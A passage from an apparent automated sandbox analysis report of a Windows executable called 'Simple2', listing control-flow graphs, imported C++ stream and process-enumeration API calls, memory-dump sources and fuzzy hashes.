                • Part of subcall function 00007FF6D5CA9AA0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF6D5CA9B44
                • Part of subcall function 00007FF6D5CA9AA0: std::_Facet_Register.LIBCPMT ref: 00007FF6D5CA9B5D
                • Part of subcall function 00007FF6D5CA9AA0: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF6D5CA9B7C
              • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6D5CA86D6
              • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6D5CA86ED
              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6D5CA872B
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$Lockit@std@@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@_Bid@locale@std@@D@std@@@1@_Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@H001@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@_U_iobuf@@V42@@V?$basic_streambuf@Vfacet@locale@2@Vlocale@2@W@std@@@std@@_get_stream_buffer_pointersstd::_
              • String ID:
              • API String ID: 3818078705-0
              • Opcode ID: f80c16aa7f3e35dcf50a6edced1f1c553555d42dd7a706662d9725effb48244f
              • Instruction ID: 4d1c7a3605f07cebc51064db15dac18c688401d3cc75b5f3eff910863bbdc02d
              • Opcode Fuzzy Hash: f80c16aa7f3e35dcf50a6edced1f1c553555d42dd7a706662d9725effb48244f
              • Instruction Fuzzy Hash: 5A51D332608B4586EB108F25E59066D7BB5FB89FD5F14442ADB8D83B24EF3CE865CB40

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1173 7ff6d5ca96f0-7ff6d5ca971f 1174 7ff6d5ca9720-7ff6d5ca9728 1173->1174 1174->1174 1175 7ff6d5ca972a-7ff6d5ca9739 1174->1175 1176 7ff6d5ca9745 1175->1176 1177 7ff6d5ca973b-7ff6d5ca973e 1175->1177 1178 7ff6d5ca9747-7ff6d5ca9757 1176->1178 1177->1176 1179 7ff6d5ca9740-7ff6d5ca9743 1177->1179 1180 7ff6d5ca9760-7ff6d5ca9772 ?good@ios_base@std@@QEBA_NXZ 1178->1180 1181 7ff6d5ca9759-7ff6d5ca975f 1178->1181 1179->1178 1182 7ff6d5ca97a4-7ff6d5ca97aa 1180->1182 1183 7ff6d5ca9774-7ff6d5ca9783 1180->1183 1181->1180 1187 7ff6d5ca97b6-7ff6d5ca97cf 1182->1187 1188 7ff6d5ca97ac-7ff6d5ca97b1 1182->1188 1185 7ff6d5ca9785-7ff6d5ca9788 1183->1185 1186 7ff6d5ca97a2 1183->1186 1185->1186 1189 7ff6d5ca978a-7ff6d5ca97a0 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1185->1189 1186->1182 1191 7ff6d5ca97d1-7ff6d5ca97d4 1187->1191 1192 7ff6d5ca97ff-7ff6d5ca981a ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1187->1192 1190 7ff6d5ca986e-7ff6d5ca988c ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1188->1190 1189->1182 1195 7ff6d5ca988e-7ff6d5ca9897 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1190->1195 1196 7ff6d5ca9898-7ff6d5ca98a8 1190->1196 1191->1192 1197 7ff6d5ca97d6-7ff6d5ca97f1 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1191->1197 1193 7ff6d5ca9847 1192->1193 1194 7ff6d5ca981c 1192->1194 1199 7ff6d5ca984a 1193->1199 1198 7ff6d5ca9820-7ff6d5ca9823 1194->1198 1195->1196 1200 7ff6d5ca98b1-7ff6d5ca98cb 1196->1200 1201 7ff6d5ca98aa-7ff6d5ca98b0 1196->1201 1202 7ff6d5ca97f3-7ff6d5ca97f8 1197->1202 1203 7ff6d5ca97fa-7ff6d5ca97fd 1197->1203 1204 7ff6d5ca984e-7ff6d5ca985e 1198->1204 1205 7ff6d5ca9825-7ff6d5ca9840 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1198->1205 1199->1204 1201->1200 1202->1199 1203->1191 1204->1190 1205->1193 1206 7ff6d5ca9842-7ff6d5ca9845 1205->1206 1206->1198
              APIs
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6D5CA976A
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6D5CA978A
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6D5CA979A
              • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF6D5CA97E7
              • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF6D5CA9811
              • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF6D5CA9836
              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6D5CA987D
              • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF6D5CA9884
              • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6D5CA9891
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@std@@Osfx@?$basic_ostream@_U?$char_traits@V12@
              • String ID:
              • API String ID: 3397294066-0
              • Opcode ID: f76aa2856fdbe99886ac723c8ffec56e959f383987e6da2831f890b10fbbf1f1
              • Instruction ID: dcb5a1b7c1940cfb4d9406bff605894cbe7dd39150d6db9ee800ad2fed7b0d4b
              • Opcode Fuzzy Hash: f76aa2856fdbe99886ac723c8ffec56e959f383987e6da2831f890b10fbbf1f1
              • Instruction Fuzzy Hash: 9B511C27609A4581EB218F1AE591A3DABB0FF84FD5F158536CE4EC7BA1DF39D8528300

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1208 7ff6d5ca94e0-7ff6d5ca9509 1209 7ff6d5ca9510-7ff6d5ca9517 1208->1209 1209->1209 1210 7ff6d5ca9519-7ff6d5ca9528 1209->1210 1211 7ff6d5ca9534 1210->1211 1212 7ff6d5ca952a-7ff6d5ca952d 1210->1212 1214 7ff6d5ca9536-7ff6d5ca9546 1211->1214 1212->1211 1213 7ff6d5ca952f-7ff6d5ca9532 1212->1213 1213->1214 1215 7ff6d5ca954f-7ff6d5ca9561 ?good@ios_base@std@@QEBA_NXZ 1214->1215 1216 7ff6d5ca9548-7ff6d5ca954e 1214->1216 1217 7ff6d5ca9593-7ff6d5ca9599 1215->1217 1218 7ff6d5ca9563-7ff6d5ca9572 1215->1218 1216->1215 1222 7ff6d5ca95a5-7ff6d5ca95b8 1217->1222 1223 7ff6d5ca959b-7ff6d5ca95a0 1217->1223 1220 7ff6d5ca9591 1218->1220 1221 7ff6d5ca9574-7ff6d5ca9577 1218->1221 1220->1217 1221->1220 1227 7ff6d5ca9579-7ff6d5ca958f ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1221->1227 1225 7ff6d5ca95ba 1222->1225 1226 7ff6d5ca95eb-7ff6d5ca9606 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1222->1226 1224 7ff6d5ca9655-7ff6d5ca9673 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1223->1224 1231 7ff6d5ca967f-7ff6d5ca968f 1224->1231 1232 7ff6d5ca9675-7ff6d5ca967e ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1224->1232 1228 7ff6d5ca95c0-7ff6d5ca95c3 1225->1228 1229 7ff6d5ca962e 1226->1229 1230 7ff6d5ca9608-7ff6d5ca960b 1226->1230 1227->1217 1228->1226 1235 7ff6d5ca95c5-7ff6d5ca95df ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1228->1235 1238 7ff6d5ca9631 1229->1238 1236 7ff6d5ca9635-7ff6d5ca9645 1230->1236 1237 7ff6d5ca960d-7ff6d5ca9627 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1230->1237 1233 7ff6d5ca9691-7ff6d5ca9697 1231->1233 1234 7ff6d5ca9698-7ff6d5ca96ac 1231->1234 1232->1231 1233->1234 1239 7ff6d5ca95e1-7ff6d5ca95e4 1235->1239 1240 7ff6d5ca95e6-7ff6d5ca95e9 1235->1240 1236->1224 1237->1229 1241 7ff6d5ca9629-7ff6d5ca962c 1237->1241 1238->1236 1239->1238 1240->1228 1241->1230
              APIs
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9559
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9579
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9589
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA95D6
              • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA95FD
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA961E
              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9664
              • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA966B
              • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9678
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
              • String ID:
              • API String ID: 1135186806-0
              • Opcode ID: 4edaa17dd7ad51bee8b47bfb92d09c61649fc27c2f4a9316c88697547ac0acde
              • Instruction ID: 295b5df2fe3e52e7056cd390dfd70466631e4e926368f98825e9e33ef2d03692
              • Opcode Fuzzy Hash: 4edaa17dd7ad51bee8b47bfb92d09c61649fc27c2f4a9316c88697547ac0acde
              • Instruction Fuzzy Hash: AC513133609A4181EB608F19E595A3DABB0FF85FD5B15C636CE5E83BA0DF39D8568300

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1243 7ff6d5caad00-7ff6d5caad3a 1244 7ff6d5caad46 1243->1244 1245 7ff6d5caad3c-7ff6d5caad3f 1243->1245 1247 7ff6d5caad48-7ff6d5caad58 1244->1247 1245->1244 1246 7ff6d5caad41-7ff6d5caad44 1245->1246 1246->1247 1248 7ff6d5caad61-7ff6d5caad73 ?good@ios_base@std@@QEBA_NXZ 1247->1248 1249 7ff6d5caad5a-7ff6d5caad60 1247->1249 1250 7ff6d5caada5-7ff6d5caadab 1248->1250 1251 7ff6d5caad75-7ff6d5caad84 1248->1251 1249->1248 1255 7ff6d5caadb7-7ff6d5caadd0 1250->1255 1256 7ff6d5caadad-7ff6d5caadb2 1250->1256 1253 7ff6d5caada3 1251->1253 1254 7ff6d5caad86-7ff6d5caad89 1251->1254 1253->1250 1254->1253 1257 7ff6d5caad8b-7ff6d5caada1 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1254->1257 1259 7ff6d5caae04-7ff6d5caae1f ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1255->1259 1260 7ff6d5caadd2-7ff6d5caadd5 1255->1260 1258 7ff6d5caae6f-7ff6d5caae8d ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1256->1258 1257->1250 1261 7ff6d5caae8f-7ff6d5caae98 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1258->1261 1262 7ff6d5caae99-7ff6d5caaea8 1258->1262 1264 7ff6d5caae21-7ff6d5caae24 1259->1264 1265 7ff6d5caae48-7ff6d5caae4b 1259->1265 1260->1259 1263 7ff6d5caadd7-7ff6d5caadf2 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1260->1263 1261->1262 1267 7ff6d5caaeb1-7ff6d5caaecb 1262->1267 1268 7ff6d5caaeaa-7ff6d5caaeb0 1262->1268 1269 7ff6d5caadff-7ff6d5caae02 1263->1269 1270 7ff6d5caadf4-7ff6d5caadfd 1263->1270 1266 7ff6d5caae4f-7ff6d5caae5f 1264->1266 1271 7ff6d5caae26-7ff6d5caae41 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1264->1271 1265->1266 1266->1258 1268->1267 1269->1260 1270->1264 1271->1265 1272 7ff6d5caae43-7ff6d5caae46 1271->1272 1272->1264
              APIs
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6D5CA1A49), ref: 00007FF6D5CAAD6B
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6D5CA1A49), ref: 00007FF6D5CAAD8B
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6D5CA1A49), ref: 00007FF6D5CAAD9B
              • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6D5CA1A49), ref: 00007FF6D5CAADE8
              • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6D5CA1A49), ref: 00007FF6D5CAAE16
              • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6D5CA1A49), ref: 00007FF6D5CAAE37
              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6D5CA1A49), ref: 00007FF6D5CAAE7E
              • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6D5CA1A49), ref: 00007FF6D5CAAE85
              • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6D5CA1A49), ref: 00007FF6D5CAAE92
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@std@@Osfx@?$basic_ostream@_U?$char_traits@V12@
              • String ID:
              • API String ID: 3397294066-0
              • Opcode ID: cb10e80f2af6a6ecea6bfc50fdf9e660d84334f5a54366d3bc9b5ef052e487fb
              • Instruction ID: a442f537b029e7e4c5428a00b2736e14e752369d4c12bdf0c12f4f015390193a
              • Opcode Fuzzy Hash: cb10e80f2af6a6ecea6bfc50fdf9e660d84334f5a54366d3bc9b5ef052e487fb
              • Instruction Fuzzy Hash: 3651F133A08A4586EB608F19D59063DABB0FF84FD5B15843BCE4E87B65DE3DD8668300

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1274 7ff6d5ca9310-7ff6d5ca934a 1275 7ff6d5ca9353-7ff6d5ca9365 ?good@ios_base@std@@QEBA_NXZ 1274->1275 1276 7ff6d5ca934c-7ff6d5ca9352 1274->1276 1277 7ff6d5ca9397-7ff6d5ca939d 1275->1277 1278 7ff6d5ca9367-7ff6d5ca9376 1275->1278 1276->1275 1279 7ff6d5ca9472-7ff6d5ca94a0 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1277->1279 1280 7ff6d5ca93a3-7ff6d5ca93c9 1277->1280 1282 7ff6d5ca9395 1278->1282 1283 7ff6d5ca9378-7ff6d5ca937b 1278->1283 1284 7ff6d5ca94a2-7ff6d5ca94ab ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1279->1284 1285 7ff6d5ca94ac-7ff6d5ca94bb 1279->1285 1287 7ff6d5ca9409-7ff6d5ca9424 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1280->1287 1288 7ff6d5ca93cb 1280->1288 1282->1277 1283->1282 1286 7ff6d5ca937d-7ff6d5ca9393 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1283->1286 1284->1285 1289 7ff6d5ca94c4-7ff6d5ca94d8 1285->1289 1290 7ff6d5ca94bd-7ff6d5ca94c3 1285->1290 1286->1277 1292 7ff6d5ca9427-7ff6d5ca942b 1287->1292 1291 7ff6d5ca93d0-7ff6d5ca93d5 1288->1291 1290->1289 1293 7ff6d5ca9430-7ff6d5ca9435 1291->1293 1294 7ff6d5ca93d7-7ff6d5ca93da 1291->1294 1292->1293 1298 7ff6d5ca9462 1293->1298 1299 7ff6d5ca9437-7ff6d5ca943a 1293->1299 1296 7ff6d5ca9406 1294->1296 1297 7ff6d5ca93dc-7ff6d5ca9404 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1294->1297 1296->1287 1297->1291 1298->1279 1299->1298 1300 7ff6d5ca943c-7ff6d5ca9460 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1299->1300 1300->1292
              APIs
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6D5CA935D
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6D5CA937D
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6D5CA938D
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6D5CA93ED
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6D5CA9416
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6D5CA944D
              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6D5CA9491
              • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF6D5CA9498
              • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6D5CA94A5
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: ?sputc@?$basic_streambuf@D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
              • String ID:
              • API String ID: 569342377-0
              • Opcode ID: 15a03189b274fb8324ea74e98fa5bbb580fa16b3cd8c430ff54d2bfccaf7f256
              • Instruction ID: f410437d5b5d6839ed520c89c1fa50cefd10a14193330da4ad95445faae25427
              • Opcode Fuzzy Hash: 15a03189b274fb8324ea74e98fa5bbb580fa16b3cd8c430ff54d2bfccaf7f256
              • Instruction Fuzzy Hash: 8D513F37609A8186EB108F59D5D063CABB0FB85FD5B158536CE5E87BA0CF38D866C600

              Control-flow Graph

              APIs
              • memset.VCRUNTIME140(?,?,?), ref: 00007FF6D5CA3C8B
                • Part of subcall function 00007FF6D5CA6390: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6D5CA63CA
                • Part of subcall function 00007FF6D5CA6390: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF6D5CA63E6
                • Part of subcall function 00007FF6D5CA6390: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6D5CA6418
              • K32EnumProcesses.KERNEL32(?,?,?), ref: 00007FF6D5CA3CA9
              • memset.VCRUNTIME140(?,?,?), ref: 00007FF6D5CA3D57
              • OpenProcess.KERNEL32(?,?,?), ref: 00007FF6D5CA3D66
              • K32EnumProcessModules.KERNEL32(?,?,?), ref: 00007FF6D5CA3D87
              • K32GetModuleBaseNameA.KERNEL32(?,?,?), ref: 00007FF6D5CA3DA6
              • CloseHandle.KERNELBASE(?,?,?), ref: 00007FF6D5CA3DCF
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?), ref: 00007FF6D5CA3E28
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?), ref: 00007FF6D5CA3E32
                • Part of subcall function 00007FF6D5CA9BB0: memcpy.VCRUNTIME140 ref: 00007FF6D5CA9BE8
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$EnumProcessmemset$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@BaseCloseD@std@@@1@@HandleModuleModulesNameOpenProcessesV?$basic_streambuf@memcpy
              • String ID:
              • API String ID: 3444793848-0
              • Opcode ID: 001c237f97d5f8cac39dba6690658c1a24ce0538eeddbe328d7bd751e8db2459
              • Instruction ID: 5fde919a4d138625f9642afb9950ff13fee5553bebd51f47f2863d9db9de1fd5
              • Opcode Fuzzy Hash: 001c237f97d5f8cac39dba6690658c1a24ce0538eeddbe328d7bd751e8db2459
              • Instruction Fuzzy Hash: 9A514F33A18A8686EB20CB21E4509ED6B71FB85FC4F54403AEE4D93A58EF7CD955CB00
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
              • String ID:
              • API String ID: 1133592946-0
              • Opcode ID: b36050c3393a8da228e922bd9e4049c9505ee04a9bc4197bf93d5a9783a52870
              • Instruction ID: e2058735eac3eaad75dbfc75929e20a1e9d88003cac2f00a4315cb2871466254
              • Opcode Fuzzy Hash: b36050c3393a8da228e922bd9e4049c9505ee04a9bc4197bf93d5a9783a52870
              • Instruction Fuzzy Hash: 72313D27A0C54241FA14AB60A551BBD1BB1AFA1FC8F48443FED4DC7AD7DE6CAC64C610
              APIs
              Memory Dump Source
